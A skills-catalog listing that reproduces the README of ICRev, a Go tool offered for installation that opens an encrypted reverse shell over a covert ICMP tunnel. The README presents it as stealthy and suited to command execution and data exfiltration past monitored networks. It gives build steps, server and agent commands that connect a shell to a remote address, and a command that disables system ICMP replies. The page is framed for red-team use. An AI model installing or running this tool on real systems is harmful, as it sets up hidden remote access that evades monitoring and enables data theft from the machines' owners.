SkillAgentSearch skills...

ICRev

Establishes an encrypted reverse shell between a server and client over an ICMP-based covert tunnel

Install / Use

/learn @DarkBitx/ICRev
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

ICRev v1.0

ICRev is a lightweight ICMP tunneling tool developed in Go, providing an encrypted reverse shell channel over ICMP packets. Designed for red team engagements and penetration testing scenarios where conventional network channels may be monitored or restricted, ICRev operates as a fully self-contained application without external dependencies, leveraging only Go's standard library.

<img width="1920" height="1080" alt="alt" src="https://github.com/user-attachments/assets/1452db94-bd21-4a70-b06b-b2dc3961a9f0" />

Key Features

  • ICMP Client/Server Reverse Shell Mode: Enables secure, bidirectional communication via ICMP for command execution and data exfiltration.
  • AES-Encrypted Payloads: Supports configurable secret keys or auto-generated keys for robust encryption.
  • HMAC-Authenticate Payloads: Payloads are authenticated with HMAC (SHA-256) to ensure integrity and origin, preventing tampering and spoofing.
  • Minimal Dependencies: No external libraries required, ensuring portability and ease of deployment.

Quick Start: Build and Installation

These instructions assume Go 1.20+ is installed with GOPATH and GOROOT properly configured.

git clone https://github.com/DarkBitx/ICRev.git
cd ICRev
go mod tidy
go build -trimpath -ldflags="-s -w"

Verification:

icrev --help

Usage

Usage: ICRev [options]

ICRev is a stealthy ICMP tunneling tool for secure reverse shell operations.

Required Options:
  -i, --interface string   Interface IP to listen on (e.g., 0.0.0.0)
  -t, --target string      Target address to establish tunnel (e.g., 192.168.1.100)

Optional Options:
  -p, --secret string      Secret key for authentication (default: auto-generated)
  -s, --server             Enable server mode (default: agent mode)
  -v, --verbose            Enable verbose output

Example:
  icrev -i 0.0.0.0 -t 192.168.1.100 -s -v

System Requirements & Configuration

Root privileges are required for creating and handling raw ICMP sockets.

Before running ICRev in server mode, it’s recommended to disable system ICMP echo responses to prevent conflicts with the tool’s packet handling:

sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1

Examples

Start the Server (listen for incoming agent packets):

./icrev -i 0.0.0.0 -t 192.168.1.100 -s

Run the Agent (connect to the server):

./icrev -t 192.168.1.100 -i 0.0.0.0

Use a Static Secret Key:

./icrev --interface 0.0.0.0 --target 192.168.1.100 --server --secret "YourSuperSecretKey"

Contact

Author: DarkBit "Lucyber" | Email: darkbitx01@protonmail.com | Telegram: https://t.me/DarkBitx

Related Skills

View on GitHub
GitHub Stars10
CategoryDevelopment
Updated4mo ago
Forks4

Languages

Go

Security Score

87/100

Audited on Nov 14, 2025

No findings